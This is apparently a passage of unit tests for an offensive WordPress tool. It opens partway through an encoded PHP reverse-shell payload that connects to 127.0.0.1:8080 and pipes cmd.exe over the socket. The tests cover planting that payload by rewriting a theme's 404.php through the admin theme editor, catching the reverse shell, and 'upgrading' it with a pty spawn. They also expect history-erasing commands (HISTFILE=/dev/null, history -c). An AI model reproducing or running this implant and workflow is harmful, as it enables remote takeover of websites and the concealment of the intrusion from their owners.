wogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIHdoaWxlICgkc2l6ZSA%2BIDAgJiYgKCRieXRlcyA9ICRzaXplID49ICR0aGlzLT5idWZmZXIgPyAkdGhpcy0%2BYnVmZmVyIDogJHNpemUpICYmICgkZGF0YSA9ICR0aGlzLT5yZWFkKCRpbnB1dCwgJGluYW1lLCAkYnl0ZXMpKSAmJiAkdGhpcy0%2Bd3JpdGUoJG91dHB1dCwgJG9uYW1lLCAkZGF0YSkpIHsKICAgICAgICAgICAgJHNpemUgLT0gJGJ5dGVzOwogICAgICAgICAgICAkdGhpcy0%2BZHVtcCgkZGF0YSk7IAogICAgICAgIH0KICAgIH0KICAgIHB1YmxpYyBmdW5jdGlvbiBydW4oKSB7CiAgICAgICAgaWYgKCEkdGhpcy0%2BZGFlbW9uaXplKCkpIHsKICAgICAgICAgICAgJHRoaXMtPnNldHRpbmdzKCk7CiAgICAgICAgICAgICRzb2NrZXQgPSBAZnNvY2tvcGVuKCR0aGlzLT5hZGRyLCAkdGhpcy0%2BcG9ydCwgJGVycm5vLCAkZXJyc3RyLCAzMCk7CiAgICAgICAgICAgIGlmICghJHNvY2tldCkgeyB9IAogICAgICAgICAgICBlbHNlIHsKICAgICAgICAgICAgICAgIHN0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2tldCwgZmFsc2UpOyAKICAgICAgICAgICAgICAgICRwcm9jZXNzID0gQHByb2Nfb3BlbignY21kLmV4ZScsICR0aGlzLT5kZXNjcmlwdG9yc3BlYywgJHBpcGVzLCBudWxsLCBudWxsKTsKICAgICAgICAgICAgICAgIGlmICghJHByb2Nlc3MpIHsKICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgZm9yZWFjaCAoJHBpcGVzIGFzICRwaXBlKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIHN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGUsIGZhbHNlKTsgCiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICRzdGF0dXMgPSBwcm9jX2dldF9zdGF0dXMoJHByb2Nlc3MpOwogICAgICAgICAgICAgICAgICAgIGRvIHsKICAgICAgICAgICAgICAgICAgICAgICAgJHN0YXR1cyA9IHByb2NfZ2V0X3N0YXR1cygkcHJvY2Vzcyk7CiAgICAgICAgICAgICAgICAgICAgICAgIGlmIChmZW9mKCRzb2NrZXQpKSB7IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSBpZiAoZmVvZigkcGlwZXNbMV0pIHx8ICEkc3RhdHVzWydydW5uaW5nJ10pIHsgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7IAogICAgICAgICAgICAgICAgICAgICAgICB9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgJHN0cmVhbXMgPSBhcnJheSgKICAgICAgICAgICAgICAgICAgICAgICAgICAgICdyZWFkJyAgID0%2BIGFycmF5KCRzb2NrZXQsICRwaXBlc1sxXSwgJHBpcGVzWzJdKSwgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAnd3JpdGUnICA9PiBudWxsLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgJ2V4Y2VwdCcgPT4gbnVsbAogICAgICAgICAgICAgICAgICAgICAgICApOwogICAgICAgICAgICAgICAgICAgICAgICAkbnVtX2NoYW5nZWRfc3RyZWFtcyA9IEBzdHJlYW1fc2VsZWN0KCRzdHJlYW1zWydyZWFkJ10sICRzdHJlYW1zWyd3cml0ZSddLCAkc3RyZWFtc1snZXhjZXB0J10sIDApOyAKICAgICAgICAgICAgICAgICAgICAgICAgaWYgKCRudW1fY2hhbmdlZF9zdHJlYW1zID09PSBmYWxzZSkgeyB9IAogICAgICAgICAgICAgICAgICAgICAgICBlbHNlIGlmICgkbnVtX2NoYW5nZWRfc3RyZWFtcyA%2BIDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChpbl9hcnJheSgkc29ja2V0LCAkc3RyZWFtc1sncmVhZCddKS8qLS0tLS0tKi8pIHsgJHRoaXMtPnJ3ICgkc29ja2V0ICAsICRwaXBlc1swXSwgJ1NPQ0tFVCcsICdTVERJTicgKTsgfSAKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgoJGZzdGF0ID0gZnN0YXQoJHBpcGVzWzJdKSkgJiYgJGZzdGF0WydzaXplJ10pIHsgJHRoaXMtPmJydygkcGlwZXNbMl0sICRzb2NrZXQgICwgJ1NUREVSUicsICdTT0NLRVQnKTsgfSAKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgoJGZzdGF0ID0gZnN0YXQoJHBpcGVzWzFdKSkgJiYgJGZzdGF0WydzaXplJ10pIHsgJHRoaXMtPmJydygkcGlwZXNbMV0sICRzb2NrZXQgICwgJ1NURE9VVCcsICdTT0NLRVQnKTsgfQogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgfSB3aGlsZSAoISR0aGlzLT5lcnJvcik7CgogICAgICAgICAgICAgICAgICAgIGZvcmVhY2ggKCRwaXBlcyBhcyAkcGlwZSkgewogICAgICAgICAgICAgICAgICAgICAgICBmY2xvc2UoJHBpcGUpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICBwcm9jX2Nsb3NlKCRwcm9jZXNzKTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGZjbG9zZSgkc29ja2V0KTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KfQplY2hvICc8cHJlPic7CiRzaCA9IG5ldyBTaGVsbCgnMTI3LjAuMC4xJywgODA4MCk7CiRzaC0%2BcnVuKCk7CnVuc2V0KCRzaCk7CmVjaG8gJzwvcHJlPic7Cg%3D%3D&php')
    
    @responses.activate
    def test_is_linux(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.web_shell_url}',
            'status'         : 200,
            'body'           : mocks.wordpress_os_detection_linux_response
        })
        
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        self.assertTrue(shell_service.is_linux())
    
    @responses.activate
    def test_is_not_linux(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.web_shell_url}',
            'status'         : 200,
            'body'           : mocks.wordpress_os_detection_windows_response
        })
        
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        self.assertFalse(shell_service.is_linux())
    
    def test_is_linux_shell(self):
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        listener = shell_service.prepare_listener()
        remote_shell = remote(self.lhost, self.lport)
        remote_shell.sendline(b'$')

        self.assertTrue(shell_service.is_rev_shell(listener))
    
    def test_is_windows_shell(self):
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        listener = shell_service.prepare_listener()
        remote_shell = remote(self.lhost, self.lport)
        remote_shell.sendline(b'Windows')

        self.assertTrue(shell_service.is_rev_shell(listener))
    
    def test_no_shell(self):
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        listener = shell_service.prepare_listener()
        remote(self.lhost, self.lport)

        self.assertFalse(shell_service.is_rev_shell(listener))
    
    def test_upgrade_shell(self):
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        listener = shell_service.prepare_listener()
        remote_shell = remote(self.lhost, self.lport)
        expected_commands = ['export HISTFILE=/dev/null', 'which python', 'which bash', 'python -c \'import pty; pty.spawn("/bin/bash")\'; exit', 'export HISTFILE=/dev/null', 'stty rows 38 columns 116', " alias ls='ls --color=auto'", 'export TERM=xterm', 'history -c']
        commands_executed = []

        # Mock listener a bit
        def mocked_sendline(x): 
            remote_shell.sendline(b'fake@fake:~$ /usr/bin/python /bin/bash')
            commands_executed.append(x.decode())
        listener.sendline = mocked_sendline

        shell_service.upgrade_shell(listener)
        listener.close()
        self.assertListEqual(commands_executed, expected_commands)

    
    def test_find_pty_spawn_vector(self):
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        listener = shell_service.prepare_listener()
        remote_shell = remote(self.lhost, self.lport)

        # Mock listener a bit
        def mocked_sendline(x): remote_shell.sendline(b'fake@fake:~$ /usr/bin/python /bin/bash')
        listener.sendline = mocked_sendline

        self.assertEqual(shell_service.find_pty_spawn_vector(listener), SHELL_STABILIZATION_METHODS['python']['bash'])
        listener.close()
    
    def test_find_pty_spawn_vector_error(self):
        shell_service = ShellService(self.web_shell_url, self.lhost, self.lport)
        listener = shell_service.prepare_listener()
        remote_shell = remote(self.lhost, self.lport)

        # Mock listener a bit
        def mocked_sendline(x): remote_shell.sendline(b'fake@fake:~$ ')
        listener.sendline = mocked_sendline

        self.assertRaises(Exception, shell_service.find_pty_spawn_vector, listener)
        listener.close()


if __name__ == '__main__':
    unittest.main()



import unittest, responses, requests
from omega_wp.services import PayloadService
from tests import mocks


class PayloadServiceTest(unittest.TestCase):
    wp_url = 'http://fancy-wordpress-site.com'
    
    @responses.activate
    def test_get_theme_name(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/themes.php',
            'status'         : 200,
            'body'           : mocks.wordpress_themes_response
        })
        
        payload_service = PayloadService(self.wp_url, requests.Session())
        self.assertEqual(payload_service.get_theme_name(), 'twentytwentyone')
    
    @responses.activate
    def test_get_theme_name_error(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/themes.php',
            'status'         : 403
        })
        
        payload_service = PayloadService(self.wp_url, requests.Session())
        self.assertRaises(Exception, payload_service.get_theme_name, 'twentytwentyone')
    
    @responses.activate
    def test_get_theme_404_template_form_data(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone',
            'status'         : 200,
            'body'           : mocks.wordpress_theme_editor_response
        })
        
        payload_service = PayloadService(self.wp_url, requests.Session())
        form_data = payload_service.get_theme_404_template_form_data('twentytwentyone')
        self.assertTrue(type(form_data) is dict)
    
    @responses.activate
    def test_get_theme_404_template_form_data_error(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone',
            'status'         : 403
        })
        
        payload_service = PayloadService(self.wp_url, requests.Session())
        self.assertRaises(Exception, payload_service.get_theme_404_template_form_data, 'twentytwentyone')
    
    def test_is_payload_already_dropped(self):
        payload_service = PayloadService(self.wp_url, requests.Session())
        self.assertTrue(payload_service.is_payload_already_dropped(payload_service.payload))
    
    def test_is_not_payload_already_dropped(self):
        payload_service = PayloadService(self.wp_url, requests.Session())
        self.assertFalse(payload_service.is_payload_already_dropped('123123123'))
    
    @responses.activate
    def test_drop_payload(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/themes.php',
            'status'         : 200,
            'body'           : mocks.wordpress_themes_response
        })
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone',
            'status'         : 200,
            'body'           : mocks.wordpress_theme_editor_response
        })
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/wp-admin/theme-editor.php',
            'status'         : 200
        })

        payload_service = PayloadService(self.wp_url, requests.Session())
        result = payload_service.drop_payload()
        self.assertEqual(result, 'http://fancy-wordpress-site.com/wp-content/themes/twentytwentyone/404.php')
    
    @responses.activate
    def test_drop_payload_error(self):
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/themes.php',
            'status'         : 200,
            'body'           : mocks.wordpress_themes_response
        })
        responses.add(**{
            'method'         : responses.GET,
            'url'            : f'{self.wp_url}/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone',
            'status'         : 200,
            'body'           : mocks.wordpress_theme_editor_response
        })
        responses.add(**{
            'method'         : responses.POST,
            'url'            : f'{self.wp_url}/wp-admin/theme-editor.php',
            'status'         : 403
        })

        payload_service = PayloadService(self.wp_url, requests.Session())
        self.assertRaises(Exception, payload_service.drop_payload)

if __name__ == '__main__':
    unittest.main()
